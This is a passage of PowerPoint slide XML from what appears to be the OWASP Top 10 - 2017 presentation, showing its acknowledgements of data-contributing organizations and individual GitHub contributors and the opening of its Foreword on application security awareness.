              <a:t>Acknowledgements</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 14"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="823534698"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="8166478"/>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70123">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Data Contributors</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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32529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We’d like to thank the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many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organizations that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contributed their vulnerability data to support the 2017 update:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:endParaRPr lang="en-US"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tab pos="266700" algn="l"/>
                          <a:tab pos="361950" algn="l"/>
                          <a:tab pos="1885950" algn="l"/>
                          <a:tab pos="1971675" algn="l"/>
                          <a:tab pos="3409950" algn="l"/>
                          <a:tab pos="3495675" algn="l"/>
                          <a:tab pos="4933950" algn="l"/>
                          <a:tab pos="5019675" algn="l"/>
                        </a:tabLst>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US"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endParaRPr lang="en-US" sz="1800" u="none" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>For the first time, all the data contributed to a Top 10 release, and the full list of contributors </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>is publicly available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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676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Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Acknowledgements to Individual Contributors</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:uLnTx/>
                        <a:uFillTx/>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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608774898"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="41626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50" b="0" i="0" u="none" strike="noStrike"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We’d like to thank </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="none" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the individual contributors who spent many hours collectively contributing to the Top 10 in GitHub:</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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFill>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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="92D050"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2"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5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950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>And everyone else who provided feedback via Twitter, email, and other means.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950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We would be remiss not to mention that Dirk Wetter, Jim </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Manico</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and Osama </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Elnaggar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> have provided extensive assistance. Also, Chris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Frohoff</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> and Gabriel Lawrence provided invaluable support in the writing of the new A8:2017-Insecure Deserialization risk.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" kern="1200" dirty="0">
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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3113917270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C6CA28A-C875-42F4-A969-9E4EBCDC2625}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5202070"/>
            <a:ext cx="6858000" cy="3105345"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="5" spcCol="274320" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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ak47gen</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alonergan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ameft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anantshri</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bandrzej</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bchurchill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binarious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bkimminich</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Boberski</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borischen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Calico90</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chrish</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clerkendweller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D00gs</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davewichers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drkknight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drwetter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dune73</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ecbftw</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einsweniger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ekobrin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eoftedal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frohoff</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fzipi</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gebl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Gilc83</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gilzow</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global4g</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grnd</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h3xstream</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hiralph</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HoLyVieR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ilatypov</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irbishop</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itscooper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ivanr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jeremylong</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jhaddix</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jmanico</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joaomatosf</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jrmithdobbs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jsteven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jvehent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katyanton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kerberosmansour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koto</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m8urnett</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mwcoates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neo00</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nickthetait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ninedter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ossie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-git</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PauloASilva</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PeterMosmans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pontocom</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psiinon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pwntester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raesene</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riramar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ruroot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securestep9</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securitybits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SPoint42</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sreenathsasikumar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starbuck3000</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stefanb</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sumitagarwalusa</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taprootsec</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tghosth</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TheJambo</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thesp0nge</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toddgrotenhuis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troymarshall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tsohlacol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vdbaan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yohgaki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="950" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EC5A71-CDF7-40E6-9F8A-7B7F0554B2F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8722" y="1601670"/>
            <a:ext cx="6849278" cy="2655328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" numCol="4" spcCol="457200" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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ANCAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">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Aspect Security</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AsTech</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Consulting</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Atos</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Branding Brand</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Bugcrowd</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BUGemot</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CDAC</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Checkmarx</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Colegio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> LaSalle Monteria</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Company.com</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ContextIS</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Contrast Security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DDoS.com</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Derek Weeks</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Easybss</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Edgescan</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EVRY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EZI</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Hamed</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Hidden</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I4 Consulting</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iBLISS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Seguran̤a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Intelig̻encia</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ITsec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Security Services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bv</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Khallagh</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Linden Lab</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M. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Limacher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> IT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dienstleistungen</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Micro Focus Fortify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Minded Security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National Center for Cyber Security Technology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Network Test Labs Inc.</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Osampa</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Paladion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="950" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Networks</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Purpletalk</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Secure Network</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Shape Security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SHCP</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Softtek</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Synopsis</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TCS</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Vantage Point</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Veracode</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Web.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11078437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00AD95-9F88-4DD0-B766-7519976466A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="6887444" cy="91440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6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3683855018"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="987552"/>
          <a:ext cx="6858000" cy="8283431"/>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6758">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Foreword</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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6080777">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Insecure software is undermining our financial, healthcare, defense, energy, and other critical infrastructure. As our software becomes increasingly complex, and connected, the difficulty of achieving application security increases exponentially. The rapid pace of modern software development processes makes the most common risks essential to discover and resolve quickly and accurately. We can no longer afford to tolerate relatively simple security problems like those presented in this OWASP Top 10.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A great deal of feedback was received during the creation of the OWASP Top 10 - 2017, more than for any other equivalent OWASP effort. This shows how much passion the community has for the OWASP Top 10, and thus how critical it is for OWASP to get the Top 10 right for the majority of use cases.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Although the original goal of the OWASP Top 10 project was simply to raise awareness amongst developers and managers, it has become </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" i="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> de facto application security standard. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In this release, issues and recommendations are written concisely and in a testable way to assist with the adoption of the OWASP Top 10 in application security programs. We encourage large and high performing organizations to use the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Application Security Verification Standard (ASVS)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> if a true standard is required, but for most, the OWASP Top 10 is a great start on the application security journey.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We have written up a range of suggested next steps for different users of the OWASP Top 10, including </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Developers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Security Testers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Organizations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which is suitable for CIOs and CISOs, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>What’s Next for Application Managers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which is suitable for application managers or anyone responsible for the lifecycle of the application.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In the long term, we encourage all software development teams and organizations to create an application security program that is compatible with your culture and technology. These programs come in all shapes and sizes. Leverage your organization's existing strengths to measure and improve your application security program using the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Software Assurance Maturity Model</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
